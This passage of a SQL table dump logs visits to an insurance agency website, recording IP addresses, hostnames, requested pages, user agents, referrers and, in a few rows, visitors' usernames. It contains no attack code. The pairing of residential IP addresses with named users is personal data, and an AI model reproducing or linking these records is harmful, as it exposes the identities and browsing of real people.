900','','','','','','0','51',0),(11051,'0b_c8b27768389248ef088e4b296f1d3dea','1459457865','66.249.83.144,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(11054,'0b_06cc313e7cdd987af0100cc4ea1735ab','1459458304','204.79.180.156','204.79.180.156','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)','','',0,'Win7','IE 9','us','','','','','','','0','0',0),(11055,'0b_06cc313e7cdd987af0100cc4ea1735ab','1459458317','204.79.180.168','204.79.180.168','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)','http://www.empireins.com/','',0,'Win7','IE 9','us','','','','','','','0','0',0),(11057,'0b_c18c8da2be3c53e5c698787223302e9c','1459459049','66.249.75.103','crawl-66-249-75-103.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11058,'0b_26a0cd5b6df17b71fcbde9f467ba294a','1459459570','45.46.202.205','cpe-45-46-202-205.rochester.res.rr.com','/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)','','',0,'Win7','IE 8','us','','','','','','','0','0',0),(11060,'0b_5d5891ce4ddda8c046967e549f20d520','1459459577','45.46.202.205','cpe-45-46-202-205.rochester.res.rr.com','/about-us/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(11063,'0b_5d5891ce4ddda8c046967e549f20d520','1459459577','45.46.202.205','cpe-45-46-202-205.rochester.res.rr.com','/contact/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(11064,'0b_fb1980243b1654ae955666e1ffcfe591','1459462556','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11066,'0b_5474b2a456b2d58c6b6a292a86b2a250','1459464290','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(11067,'0b_445a7b4ecd4cd8b8b7fcc660ed221ea3','1459464357','69.199.86.25','69.199.86.25','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://search.aol.com/aol/search?&q=empireinsurance&s_it=oneclick-ch','',0,'Win7','Chrome 49','us','','','','','','','3','0',0),(11070,'0b_4fe0b75add99383d932c073c64150ed0','1459464358','69.199.86.25','69.199.86.25','/','Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0 (Chrome)','','',0,'Linux','Firefox 10','us','','','','','','','0','0',0),(11073,'0b_cb59f8f109141c06b5ab64692dc7bf3d','1459464494','79.143.180.15','mail.ruddog.eu','/','Wget/1.13.4 (linux-gnu)','','',0,'','Wget 1','eu','','','Wget','','','','0','0',0),(11076,'0b_e7f00a0144c3d725bec377084c09bbda','1459464927','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11078,'0b_25ae49b08c3d835abc0ac5b9da6c057b','1459465343','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(11079,'0b_25ae49b08c3d835abc0ac5b9da6c057b','1459465346','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(11082,'0b_25ae49b08c3d835abc0ac5b9da6c057b','1459465350','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(11084,'0b_25ae49b08c3d835abc0ac5b9da6c057b','1459465366','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/forms/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7','IE 11','us','1600 x 900','','','','Isaacd','','0','51',0),(11085,'0b_4abbf4e1d4c4d8324a14bd0f38bd2539','1459466515','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(11087,'0b_7b50708cc1e3d0f095ce34149ad6877c','1459470273','66.249.75.103','crawl-66-249-75-103.googlebot.com','/term-quotes/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11088,'0b_d46d98d79c6be0ee611e5befd75da225','1459472342','208.115.111.66','208-115-111-66-reverse.wowrack.com','/case-status/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(11091,'0b_ce80a898aeb77fc6afa9abbbe1b1a2cd','1459473149','144.76.80.151','static.151.80.76.144.clients.your-server.de','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.2; Zune 4.7; AskTbBLPV5/5.15.4.23821; BRI/2)','','',0,'Win7 x64','IE 9','de','','','','','','','0','0',0),(11093,'0b_045e77789e79660a8aca1a3be681db47','1459474597','66.249.75.103','crawl-66-249-75-103.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(11094,'0b_9e85759c67123c7a4b302eaf222b46ae','1459476380','52.4.244.57','ec2-52-4-244-57.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31','','',0,'MacOSX','Chrome 26','','','','','','','','0','0',0),(11097,'0b_125d927a62002a47f89e02138d999694','1459476481','52.71.64.37','ec2-52-71-64-37.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31','','',0,'MacOSX','Chrome 26','','','','','','','','0','0',0),(11100,'0b_36eb34cfb36696f961c69c4057449958','1459478012','5.9.11.122','phx1.phrixos.com','/comments/feed/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','','',0,'Linux','Chrome 37','','','','','','','','0','0',0),(11102,'0b_36eb34cfb36696f961c69c4057449958','1459478013','5.9.11.122','phx1.phrixos.com','/feed/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','','',0,'Linux','Chrome 37','','','','','','','','0','0',0),(11103,'0b_36eb34cfb36696f961c69c4057449958','1459478014','5.9.11.122','phx1.phrixos.com','/home/feed/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','','',0,'Linux','Chrome 37','','','','','','','','0','0',0),(11106,'0b_4adda6c46cc0229037159395fbbb2f31','1459485312','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(11109,'0b_acb92f35f651b947d3fb4baae1c067a4','1459485747','54.233.125.143','ec2-54-233-125-143.sa-east-1.compute.amazonaws.com','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)','','',0,'WinXP','IE 6','','','','','','','','0','0',0),(11112,'0b_acb92f35f651b947d3fb4baae1c067a4','1459485747','54.233.125.143','ec2-54-233-125-143.sa-east-1.compute.amazonaws.com','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)','','',0,'WinXP','IE 6','','','','','','','','0','0',0),(11115,'0b_d71e99b54d00d9b23b493ce7dfa43483','1459487836','180.76.15.26','baiduspider-180-76-15-26.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(11118,'0b_8ed436fad2892bffec0ac96486eff7e1','1459488484','207.182.140.214','d6.8c.b6.static.xlhost.com','/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) KomodiaBot/1.0','','',0,'Win7 x64','','','','','','','','','0','0',0),(11121,'0b_f854af078f89d58cdea2b093b63d81ec','1459488792','207.182.140.214','d6.8c.b6.static.xlhost.com','/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) KomodiaBot/1.0','','',0,'Win7 x64','','','','','','','','','0','0',0),(11124,'0b_a21cc3a46412b12aa0da0384cd7b7860','1459488944','207.182.140.210','d2.8c.b6.static.xlhost.com','/','M','','',0,'','','','','','','','','','0','0',0),(11127,'0b_6b8ffff15a634358a1f9245ecee42603','1459491394','178.255.215.70','crawl06.exabot.com','/robots.txt','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(11129,'0b_6b8ffff15a634358a1f9245ecee42603','1459491395','178.255.215.70','crawl06.exabot.com','/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(11132,'0b_3eb68db859ef2d83d5f20c1c7fef43f0','1459491397','66.249.75.95','crawl-66-249-75-95.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11133,'0b_ad48d1e54651fc156e1edaf41d7e1f29','1459494375','68.180.229.38','b110166.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(11136,'0b_ad48d1e54651fc156e1edaf41d7e1f29','1459494377','68.180.229.38','b110166.yse.yahoo.net','/SSO/235_11.html','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(11138,'0b_4df4ddf9450996d53d3198527855694d','1459494377','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(11141,'0b_4df4ddf9450996d53d3198527855694d','1459494379','68.180.230.123','b115363.yse.yahoo.net','/SSO/235_11.html','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(11144,'0b_2c45458607ebbb855730b574bbe4e095','1459494987','213.239.205.207','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(11145,'0b_2c45458607ebbb855730b574bbe4e095','1459494990','213.239.205.207','majestic12.co.uk','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(11147,'0b_884ce72b6169757fe3a0f0da260c582d','1459496340','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(11150,'0b_2cbac4b97d836b6bb0bef960c3e93c3f','1459496500','66.249.75.109','crawl-66-249-75-109.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(11153,'0b_12a11811140772b2d59376447e5af44f','1459496503','66.249.75.89','crawl-66-249-75-89.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(11156,'0b_884ce72b6169757fe3a0f0da260c582d','1459496534','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/crafting-an-essay-9/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11159,'0b_408cdf2efce32c40b3a2cc607aa078a6','1459497937','65.123.142.184','65.123.142.184','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.149 Safari/537.36','','',0,'Win7','Chrome 33','','','','','','','','0','0',0),(11162,'0b_42909c5513078b3bc34c74b560f0d960','1459498966','104.194.27.26','104-194-$27.unassigned.userdns.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:16.0.1) Gecko/20121011 Firefox/16.0.1','','',0,'WinXP','Firefox 16','ua','','','','','','','0','0',0),(11163,'0b_25ed66d3f2b76cbb6508744416579fa6','1459499999','178.255.215.70','crawl06.exabot.com','/feed/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(11165,'0b_25ed66d3f2b76cbb6508744416579fa6','1459500002','178.255.215.70','crawl06.exabot.com','/comments/feed/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(11168,'0b_25ed66d3f2b76cbb6508744416579fa6','1459500005','178.255.215.70','crawl06.exabot.com','/home/feed/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(11171,'0b_0dab360e72a482911509fa9561b2a6ee','1459503083','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(11172,'0b_ea9a54e767675fba2054e24485d56abf','1459506630','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11174,'0b_b858fcc8223e83150a20cd76258dbfac','1459507711','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(11175,'0b_18aa9f1bc536335af178e3118af41e63','1459508152','208.115.111.66','208-115-111-66-reverse.wowrack.com','/members/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(11177,'0b_a90a226977ec0c7a1753cd9fddac1f19','1459509561','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11178,'0b_0bf773fcb9c71d6dbe3f589ffb271df1','1459509756','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(11180,'0b_9202da18a6965663cea3009d0106780c','1459509856','45.79.81.142','li1180-142.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(11183,'0b_8e417cac77cf1019d678bb41eb6580bb','1459512527','66.249.75.89','crawl-66-249-75-89.googlebot.com','/igo/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(11184,'0b_8e417cac77cf1019d678bb41eb6580bb','1459513592','66.249.75.95','crawl-66-249-75-95.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11186,'0b_cfb6c9fe4b055c919fc23f7e7dcd7d1f','1459513755','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(11187,'0b_7269111cc6990d2b595ecece9fcb4d88','1459513947','162.210.196.129','hosted-by.leaseweb.com','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(11189,'0b_7269111cc6990d2b595ecece9fcb4d88','1459513950','162.210.196.129','hosted-by.leaseweb.com','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(11190,'0b_37861e9341bbe514200dbf6e94549db2','1459515470','208.115.111.66','208-115-111-66-reverse.wowrack.com','/igo/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(11193,'0b_98c1d581a374a53409de11cbd6db190e','1459516003','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(11195,'0b_98c1d581a374a53409de11cbd6db190e','1459516005','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(11198,'0b_f79d8b857996b3bcc317b701b9f33867','1459516126','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(11199,'0b_f79d8b857996b3bcc317b701b9f33867','1459516127','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(11202,'0b_a1536acc2d6079d1a177e65f2da10da0','1459517834','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(11205,'0b_841fa0adedc8878319bf935f4b291a52','1459519828','12.30.47.234','12.30.47.234','/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; chromeframe/27.0.1453.110; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','http://www.google.com/url?url=http://www.empireins.com/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwjDydnszu3LAhUITCYKHbWhCs0QFgh_MAo&usg=AFQjCNEAYV0DekZuCGJGVGQL5s1vEoUPUQ','',0,'WinXP','IE 8','us','1600 x 900','','','','','','0','0',0),(11208,'0b_841fa0adedc8878319bf935f4b291a52','1459519839','12.30.47.234','12.30.47.234','/feed/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; chromeframe/27.0.1453.110; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','http://www.empireins.com/','',0,'WinXP','IE 8','us','1600 x 900','','','','','','0','0',0),(11211,'0b_841fa0adedc8878319bf935f4b291a52','1459519839','12.30.47.234','12.30.47.234','/comments/feed/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; chromeframe/27.0.1453.110; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','http://www.empireins.com/','',0,'WinXP','IE 8','us','1600 x 900','','','','','','0','0',0),(11213,'0b_841fa0adedc8878319bf935f4b291a52','1459519848','12.30.47.234','12.30.47.234','/home/feed/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; chromeframe/27.0.1453.110; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','http://www.empireins.com/','',0,'WinXP','IE 8','us','1600 x 900','','','','','','0','0',0),(11214,'0b_841fa0adedc8878319bf935f4b291a52','1459519849','12.30.47.234','12.30.47.234','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; chromeframe/27.0.1453.110; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','http://www.empireins.com/','',0,'WinXP','IE 8','us','1600 x 900','','','','','','0','0',0),(11217,'0b_841fa0adedc8878319bf935f4b291a52','1459519966','12.30.47.234','12.30.47.234','/about-us/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; chromeframe/27.0.1453.110; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','http://www.empireins.com/','',0,'WinXP','IE 8','us','1600 x 900','','','','','','0','0',0),(11219,'0b_841fa0adedc8878319bf935f4b291a52','1459519976','12.30.47.234','12.30.47.234','/about-us/feed/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; chromeframe/27.0.1453.110; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','http://www.empireins.com/about-us/','',0,'WinXP','IE 8','us','1600 x 900','','','','','','0','0',0),(11222,'0b_841fa0adedc8878319bf935f4b291a52','1459519976','12.30.47.234','12.30.47.234','/about-us/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; chromeframe/27.0.1453.110; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','http://www.empireins.com/about-us/','',0,'WinXP','IE 8','us','1600 x 900','','','','','','0','51',0),(11223,'0b_a067f902e291030763a5d245cd5f098b','1459520361','72.76.85.114','pool-72-76-85-114.nwrknj.fios.verizon.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win10','Chrome 49','us','1680 x 1050','Google','','','','','0','0',0),(11225,'0b_a067f902e291030763a5d245cd5f098b','1459520364','72.76.85.114','pool-72-76-85-114.nwrknj.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1680 x 1050','','','','','','0','0',0),(11228,'0b_0b262a7bb8de0cb66efc3d54da84a8ff','1459520470','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(11231,'0b_94ab0287b2447d2ece4f4e2ab5dfa651','1459521126','74.126.55.206','74.126.55.206','/','Mozilla','','',0,'','','','','','','','','','0','0',0),(11232,'0b_94ab0287b2447d2ece4f4e2ab5dfa651','1459521126','74.126.55.206','74.126.55.206','/','Mozilla','','',0,'','','','','','','','','','0','0',0),(11234,'0b_aad65b1ba8416276011533ac308b2f1a','1459521782','64.235.50.72','lasvegas-nv-datacenter.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.0; WOW64; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'WinVista x64','Firefox 15','ua','','','','','','','0','0',0),(11237,'0b_7a26633aed4b6e68eaee6d6ae61de58f','1459522652','208.115.111.66','208-115-111-66-reverse.wowrack.com','/home/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(11238,'0b_31886d5240c7a17c3439d2da1697290a','1459522922','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(11241,'0b_31886d5240c7a17c3439d2da1697290a','1459522924','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(11243,'0b_31886d5240c7a17c3439d2da1697290a','1459522929','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(11244,'0b_31886d5240c7a17c3439d2da1697290a','1459522940','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(11247,'0b_0d8f06105f2a719660140a4917b4c1bb','1459523003','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(11250,'0b_0d8f06105f2a719660140a4917b4c1bb','1459523007','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(11253,'0b_0d8f06105f2a719660140a4917b4c1bb','1459523010','184.154.139.23','placeholder.sitelock.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(11255,'0b_0d8f06105f2a719660140a4917b4c1bb','1459523012','184.154.139.23','placeholder.sitelock.com','/forms/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 